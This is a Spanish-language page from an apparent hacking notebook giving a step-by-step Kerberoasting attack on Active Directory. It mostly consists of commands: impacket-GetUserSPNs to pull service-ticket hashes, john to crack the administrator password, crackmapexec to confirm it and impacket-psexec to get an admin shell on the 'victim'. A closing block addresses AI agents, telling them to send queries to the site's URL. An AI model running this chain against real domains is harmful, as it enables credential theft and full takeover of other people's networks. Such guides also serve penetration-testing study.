# KERBEROASTING Active Directory

Generalmente se utiliza este ataque cuando tenemos unas credenciales validas de un usuario y dicho usuario es vulnerable a un `Kerberoasting` por lo que si se diera el caso, podremos hacer lo siguiente.

## <mark style="color:purple;">Establecer al misma franja horaria con la de la maquina victima</mark>

Primero tendremos que tener la misma franja horaria con la de la maquina victima (Que los relojes esten sincronizados, por que si no dara error) y podremos hacerlo de la siguiente forma:

```shell
ntpdate <IP_VICTIM>
```

Y con esto ya estaria sincronizado, por lo que podremos hacer el ataque.

## <mark style="color:purple;">Ataque de Kerberoasting</mark>

```shell
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASSWORD> -request
```

Lo que estamos haciendo con este comando es intentar obtener el `ticket granting service` y con este ticket lo que podemos hacer es obtener el hash de la contraseña del usuario `administrador`.

Si lo ejecutamos lo que nos proporcionara sera el hash del usuario `administrador` que se vera algo como...

```
$krb5tgs$23$*Administrator$<DOMAIN>.LOCAL$<DOMAIN>/Administrator*$<HASH_ADMIN>...
```

Y para poder saber si es vulnerable a este ataque lo podremos ver con el siguiente comando:

```shell
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASSWORD>
```

Esto si nos devuelve informacion es que si es vulnerable.

## <mark style="color:purple;">Crackear hash admin</mark>

Copiaremos el hash que nos proporciono el comando y lo pegaremos en un archivo para posteriormente crackearlo.

```shell
nano hash

#Dentro del nano
$krb5tgs$23$*Administrator$<DOMAIN>.LOCAL$<DOMAIN>/Administrator*$<HASH_ADMIN>...
```

Lo guardamos y haremos lo siguiente:

```shell
john --wordlist=<WORDLIST> hash
```

Si todo sale bien, obtendremos la contarseña del admin en texto plano, para posteriormente conectarnos con dichas credenciales.

Podremos probar dichas credenciales con la siguiente herramienta...

## <mark style="color:purple;">Comprobacion de credenciale</mark>s

```shell
crackmapexec smb <IP_VICTIM> -u 'Administartor' -p '<PASSWORD>'
```

Y si esto nos devuelve un `[+]........(Pwn3d!)` seguido de mas informacion, veremos que son correctas.

## <mark style="color:purple;">Conexion a la maquina con admin</mark>

Por lo que ahora nos conectaremos a la maquina victima mediante dichas credenciales:

```shell
impacket-psexec <DOMAIN>/Administrator:<PASSWORD>@<IP_VICTIM> cmd.exe
```

Y con esto ya estariamos dentro como `administradores`.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dise0.gitbook.io/h4cker_b00k/herramientas-tecnicas/hacking-activedirectory/kerberoasting-active-directory.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.